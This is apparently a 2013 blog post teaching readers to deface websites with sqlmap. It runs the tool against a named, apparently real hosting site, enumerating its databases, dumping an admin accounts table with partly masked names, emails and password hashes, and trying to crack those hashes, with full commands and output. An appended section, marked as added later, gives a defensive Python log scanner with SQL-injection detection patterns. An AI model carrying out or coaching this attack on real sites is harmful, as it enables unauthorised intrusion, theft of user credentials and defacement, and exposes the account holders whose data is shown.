A lot of my friends have asked to learn how to deface using this sqlmap tool..
OK, as the title says, I will share how to deface a website using the sqlmap tool. Here I am using the BackTrack OS, the hacking dragon, hehe,
because its toolset for anything hacking-related is complete.
OK, let's get straight to it:
First, find a target that has a vulnerability,
open a terminal and type:
#cd /pentest/database/sqlmap
or you can also go through the menu (alt + f1) backtrack => exploitation tool => web exploitation tool => sqlmap
then type:
#./sqlmap.py -u http://cla.pwwebhost.com/show.php?id=169 --dbs
sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 00:04:16
[00:04:16] [INFO] resuming back-end DBMS 'mysql'
[00:04:19] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=169 AND 7370=7370
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=169 AND (SELECT 5067 FROM(SELECT COUNT(*),CONCAT(0x3a7a70623a,(SELECT (CASE WHEN (5067=5067) THEN 1 ELSE 0 END)),0x3a78796c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=169 AND SLEEP(5)
---
[00:04:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.17
back-end DBMS: MySQL 5.0
[00:04:24] [INFO] fetching database names
[00:04:24] [INFO] the SQL query used returns 45 entries
available databases [45]:
[*] information_schema
[*] pwwebho_500story
[*] pwwebho_cla2011
[*] pwwebho_CLAArchive2011
[*] pwwebho_clademo
[*] pwwebho_cladrupal
[*] pwwebho_claexhib
[*] pwwebho_claexport
[*] pwwebho_claforms
[*] pwwebho_copp1
[*] pwwebho_dbconf
[*] pwwebho_dprj1
[*] pwwebho_drpl1
[*] pwwebho_drpl2
[*] pwwebho_felic
[*] pwwebho_forms
[*] pwwebho_gracedb
[*] pwwebho_informz
[*] pwwebho_jdrf
[*] pwwebho_jo151
[*] pwwebho_jo1510
[*] pwwebho_jo1511
[*] pwwebho_jo1512
[*] pwwebho_jo1513
[*] pwwebho_jo1514
[*] pwwebho_jo1515
[*] pwwebho_jo1516
[*] pwwebho_jo152
[*] pwwebho_jo153
[*] pwwebho_jo154
[*] pwwebho_jo155
[*] pwwebho_jo156
[*] pwwebho_jo157
[*] pwwebho_jo158
[*] pwwebho_jo159
[*] pwwebho_joomla
[*] pwwebho_lime1
[*] pwwebho_lime2
[*] pwwebho_lime3
[*] pwwebho_nubls
[*] pwwebho_ostt1
[*] pwwebho_tree
[*] pwwebho_vote
[*] pwwebho_wrdp1
[*] pwwebho_wrdp2
[00:04:24] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/cla.pwwebhost.com'
[*] shutting down at 00:04:24
-u = target URL
--dbs = option to enumerate the databases
Once you have the list, pick the database that most likely holds the admin login table; in this example I chose "pwwebho_claforms". Next..
#./sqlmap.py -u http://cla.pwwebhost.com/show.php?id=169 -D pwwebho_claforms --tables
[*] starting at 00:14:22
[00:14:22] [INFO] resuming back-end DBMS 'mysql'
[00:14:23] [INFO] testing connection to the target url
[00:14:26] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.17
back-end DBMS: MySQL 5.0
[00:14:26] [INFO] fetching tables for database: 'pwwebho_claforms'
[00:14:26] [INFO] the SQL query used returns 47 entries
[00:14:29] [INFO] retrieved: ft_module_menu_items
[00:14:31] [INFO] retrieved: ft_module_pages
[00:14:34] [INFO] retrieved: ft_module_pages_clients
[00:14:35] [INFO] retrieved: ft_module_submission_accounts
[00:14:37] [INFO] retrieved: ft_module_submission_accounts_data
[00:14:39] [INFO] retrieved: ft_module_submission_accounts_menus
[00:14:41] [INFO] retrieved: ft_module_submission_accounts_view_override
[00:14:42] [INFO] retrieved: ft_module_swift_mailer_email_template_fields
[00:14:44] [INFO] retrieved: ft_modules
[00:14:46] [INFO] retrieved: ft_multi_page_form_urls
[00:14:48] [INFO] retrieved: ft_public_form_omit_list
[00:14:51] [INFO] retrieved: ft_public_view_omit_list
[00:14:54] [INFO] retrieved: ft_sessions
[00:14:57] [INFO] retrieved: ft_settings
[00:14:59] [INFO] retrieved: ft_themes
[00:15:01] [INFO] retrieved: ft_view_fields
[00:15:03] [INFO] retrieved: ft_view_filters
[00:15:04] [INFO] retrieved: ft_view_tabs
[00:15:06] [INFO] retrieved: ft_views
Database: pwwebho_claforms
[47 tables]
+----------------------------------------------+
| displink_files
| displink_settings
| displink_statistics
| displink_tickets
| ft_account_settings
| ft_accounts
| ft_client_forms
| ft_client_views
| ft_email_template_edit_submission_views
| ft_email_template_recipients
| ft_email_templates
| ft_field_option_groups
| ft_field_options
| ft_field_settings
| ft_form_10
| ft_form_11
| ft_form_7
| ft_form_8
| ft_form_9
| ft_form_email_fields
| ft_form_fields
| ft_forms
| ft_hooks
| ft_menu_items
| ft_menus
| ft_module_export_group_clients
| ft_module_export_groups
| ft_module_export_types
| ft_module_menu_items
| ft_module_pages
| ft_module_pages_clients
| ft_module_submission_accounts
| ft_module_submission_accounts_data
| ft_module_submission_accounts_menus
| ft_module_submission_accounts_view_override
| ft_module_swift_mailer_email_template_fields
| ft_modules
| ft_multi_page_form_urls
| ft_public_form_omit_list
| ft_public_view_omit_list
| ft_sessions
| ft_settings
| ft_themes
| ft_view_fields
| ft_view_filters
| ft_view_tabs
| ft_views
+----------------------------------------------+
[00:15:07] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/cla.pwwebhost.com'
[*] shutting down at 00:15:07
-D = target database
--tables = to enumerate the table names
OK, it turns out there is a table "ft_accounts" in there, so let's go straight for it (this is my case; in your case it may be different, so sharpen your guessing skills, buddy, haha)
#./sqlmap.py -u http://cla.pwwebhost.com/show.php?id=169 -D pwwebho_claforms -T ft_accounts --columns
[*] starting at 00:19:12
[00:19:12] [INFO] resuming back-end DBMS 'mysql'
[00:19:13] [INFO] testing connection to the target url
[00:19:16] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.17
back-end DBMS: MySQL 5.0
[00:19:16] [INFO] fetching columns for table 'ft_accounts' in database 'pwwebho_claforms'
[00:19:19] [INFO] the SQL query used returns 16 entries
[00:19:21] [INFO] retrieved: account_id
[00:19:22] [INFO] retrieved: mediumint(8) unsigned
[00:19:24] [INFO] retrieved: account_type
[00:19:26] [INFO] retrieved: enum('admin','client')
[00:19:27] [INFO] retrieved: account_status
[00:19:29] [INFO] retrieved: enum('active','disabled','pending')
[00:19:31] [INFO] retrieved: ui_language
[00:19:33] [INFO] retrieved: varchar(50)
[00:19:34] [INFO] retrieved: timezone_offset
[00:19:36] [INFO] retrieved: varchar(4)
[00:19:38] [INFO] retrieved: sessions_timeout
[00:19:39] [INFO] retrieved: varchar(10)
[00:19:41] [INFO] retrieved: date_format
[00:19:45] [INFO] retrieved: varchar(50)
[00:19:46] [INFO] retrieved: login_page
[00:19:49] [INFO] retrieved: varchar(50)
[00:19:51] [INFO] retrieved: logout_url
[00:19:53] [INFO] retrieved: varchar(255)
[00:19:54] [INFO] retrieved: theme
[00:19:56] [INFO] retrieved: varchar(50)
[00:19:58] [INFO] retrieved: menu_id
[00:20:00] [INFO] retrieved: mediumint(8) unsigned
[00:20:02] [INFO] retrieved: first_name
[00:20:04] [INFO] retrieved: varchar(100)
[00:20:06] [INFO] retrieved: last_name
[00:20:08] [INFO] retrieved: varchar(100)
[00:20:09] [INFO] retrieved: email
[00:20:11] [INFO] retrieved: varchar(200)
[00:20:13] [INFO] retrieved: username
[00:20:15] [INFO] retrieved: varchar(50)
[00:20:16] [INFO] retrieved: password
[00:20:18] [INFO] retrieved: varchar(50)
Database: pwwebho_claforms
Table: ft_accounts
[16 columns]
+------------------+-------------------------------------+
| Column | Type
+------------------+-------------------------------------+
| account_id | mediumint(8) unsigned
| account_status | enum('active','disabled','pending')
| account_type | enum('admin','client')
| date_format | varchar(50)
| email | varchar(200)
| first_name | varchar(100)
| last_name | varchar(100)
| login_page | varchar(50)
| logout_url | varchar(255)
| menu_id | mediumint(8) unsigned
| password | varchar(50)
| sessions_timeout | varchar(10)
| theme | varchar(50)
| timezone_offset | varchar(4)
| ui_language | varchar(50)
| username | varchar(50)
+------------------+-------------------------------------+
[00:20:18] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/cla.pwwebhost.com'
[*] shutting down at 00:20:18
-T = table name
--columns = to enumerate the columns
My guess turned out to be right, hehe, so dump it straight away
#./sqlmap.py -u http://cla.pwwebhost.com/show.php?id=169 -D pwwebho_claforms -T ft_accounts --dump
[*] starting at 00:23:41
[00:23:41] [INFO] resuming back-end DBMS 'mysql'
[00:23:42] [INFO] testing connection to the target url
[00:23:45] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.17
back-end DBMS: MySQL 5.0
[00:23:45] [INFO] fetching columns for table 'ft_accounts' in database 'pwwebho_claforms'
[00:23:45] [INFO] the SQL query used returns 16 entries
[00:23:45] [INFO] resumed: account_id
[00:23:45] [INFO] resumed: mediumint(8) unsigned
[00:23:45] [INFO] resumed: account_type
[00:23:45] [INFO] resumed: enum('admin','client')
[00:23:45] [INFO] resumed: account_status
[00:23:45] [INFO] resumed: enum('active','disabled','pending')
[00:23:45] [INFO] resumed: ui_language
[00:23:45] [INFO] resumed: varchar(50)
[00:23:45] [INFO] resumed: timezone_offset
[00:23:45] [INFO] resumed: varchar(4)
[00:23:45] [INFO] resumed: sessions_timeout
[00:23:45] [INFO] resumed: varchar(10)
[00:23:45] [INFO] resumed: date_format
[00:23:45] [INFO] resumed: varchar(50)
[00:23:45] [INFO] resumed: login_page
[00:23:45] [INFO] resumed: varchar(50)
[00:23:45] [INFO] resumed: logout_url
[00:23:45] [INFO] resumed: varchar(255)
[00:23:45] [INFO] resumed: theme
[00:23:45] [INFO] resumed: varchar(50)
[00:23:45] [INFO] resumed: menu_id
[00:23:45] [INFO] resumed: mediumint(8) unsigned
[00:23:45] [INFO] resumed: first_name
[00:23:45] [INFO] resumed: varchar(100)
[00:23:45] [INFO] resumed: last_name
[00:23:45] [INFO] resumed: varchar(100)
[00:23:45] [INFO] resumed: email
[00:23:45] [INFO] resumed: varchar(200)
[00:23:45] [INFO] resumed: username
[00:23:45] [INFO] resumed: varchar(50)
[00:23:45] [INFO] resumed: password
[00:23:45] [INFO] resumed: varchar(50)
[00:23:45] [INFO] fetching entries for table 'ft_accounts' in database 'pwwebho_claforms'
[00:23:47] [INFO] the SQL query used returns 2 entries
[00:23:49] [INFO] retrieved: 1
[00:23:51] [INFO] retrieved: active
[00:23:52] [INFO] retrieved: admin
[00:23:54] [INFO] retrieved: M jS, g:i A
[00:23:56] [INFO] retrieved: pe***@*****design.com
[00:23:57] [INFO] retrieved: Pe**y
[00:23:59] [INFO] retrieved: **rne
[00:24:01] [INFO] retrieved: admin_forms
[00:24:03] [INFO] retrieved: http://cla.pwwebhost.com/formtools
[00:24:05] [INFO] retrieved: 1
[00:24:07] [INFO] retrieved: fd027c9bdfc366945915749be5dfd449
[00:24:09] [INFO] retrieved: 30
[00:24:10] [INFO] retrieved: default
[00:24:12] [INFO] retrieved: 0
[00:24:14] [INFO] retrieved: en_us
[00:24:15] [INFO] retrieved: ****ake
[00:24:17] [INFO] retrieved: 2
[00:24:19] [INFO] retrieved: active
[00:24:21] [INFO] retrieved: client
[00:24:23] [INFO] retrieved: M jS y, g:i A
[00:24:24] [INFO] retrieved: *****ne@****ail.com
[00:24:26] [INFO] retrieved: Wendy
[00:24:28] [INFO] retrieved: Walton
[00:24:30] [INFO] retrieved: client_forms
[00:24:31] [INFO] retrieved: http://cla.pwwebhost.com/formtools
[00:24:33] [INFO] retrieved: 2
[00:24:34] [INFO] retrieved: 7f3e1ed7c0a4450e575a9d70c11f01ea
[00:24:36] [INFO] retrieved: 60
[00:24:38] [INFO] retrieved: default
[00:24:39] [INFO] retrieved: 0
[00:24:42] [INFO] retrieved: en_us
[00:24:43] [INFO] retrieved: wendyw
[00:24:43] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [Y/n/q] y
[00:31:07] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
1
[00:31:15] [INFO] using default dictionary
[00:31:15] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[00:31:19] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[00:31:19] [INFO] starting 4 processes
[00:31:24] [INFO] writing uncracked hashes to file '/tmp/tmp7Yf0NT.txt' for eventual further processing
[00:31:24] [WARNING] no clear password(s) found
[00:31:24] [INFO] postprocessing table dump
Database: pwwebho_claforms
Table: ft_accounts
--dump = to pull the entire contents of that table
I cut part of the output because the result was a jumbled mess; I took a screenshot instead so it's clear, hehe
OK, all that's left is to find the admin login page and crack the password hash, and it's done, hehe..
Now it's up to you, buddy, how you use this tool.. :D
Sorry I didn't include any pictures.. I think this is already clear enough to understand..
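Since the sqlmap output above shows exactly what these probes look like in a web server's logs (the boolean-based `AND 7370=7370`, the error-based `INFORMATION_SCHEMA`/`FLOOR(RAND(0)*2)` query and the time-based `SLEEP(5)` against the `id` parameter), here is a defender-side example, added here and not part of the original post, that scans Apache access-log lines for those three payload shapes and for the sqlmap User-Agent. The log lines, timestamps and IP addresses are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# One signature per technique sqlmap reported: boolean-based (AND n=n),
# error-based (INFORMATION_SCHEMA / FLOOR(RAND(0)*2)) and time-based (SLEEP / BENCHMARK).
SIGNATURES = {
    "boolean_tautology": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "error_based": re.compile(r"INFORMATION_SCHEMA\.\w+|FLOOR\(RAND\(0\)\*2\)", re.I),
    "time_based": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
}

def inspect_request(path, ua):
    """Return the signature names triggered by one request's query values and User-Agent."""
    hits = []
    # parse_qsl URL-decodes each value, so encoded payloads (%20, %3D, %28) are inspected in clear.
    for _, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        for name, pattern in SIGNATURES.items():
            if name not in hits and pattern.search(value):
                hits.append(name)
    if "sqlmap" in ua.lower():
        hits.append("sqlmap_user_agent")
    return hits

def scan_log(lines):
    """Scan access-log lines and return (ip, decoded path, hits) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            hits = inspect_request(m["path"], m["ua"])
            if hits:
                findings.append((m["ip"], unquote_plus(m["path"]), hits))
    return findings

# Constructed sample log: one legitimate request, then the three probe types seen in the post.
SAMPLE_LOG = """\
198.51.100.7 - - [26/Apr/2013:00:03:58 +0700] "GET /show.php?id=169 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Apr/2013:00:04:16 +0700] "GET /show.php?id=169%20AND%207370%3D7370 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.5 - - [26/Apr/2013:00:04:17 +0700] "GET /show.php?id=169%20AND%20(SELECT%201%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS) HTTP/1.1" 500 310 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.5 - - [26/Apr/2013:00:04:22 +0700] "GET /show.php?id=169%20AND%20SLEEP%285%29 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
"""

if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{ip} {path} -> {', '.join(hits)}")
```

The User-Agent check only catches sqlmap runs that keep the default agent; the query-string signatures are what matter, and the real fix for the page shown is a parameterised query on `id` so none of these payloads reach the database.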
Friday, April 26, 2013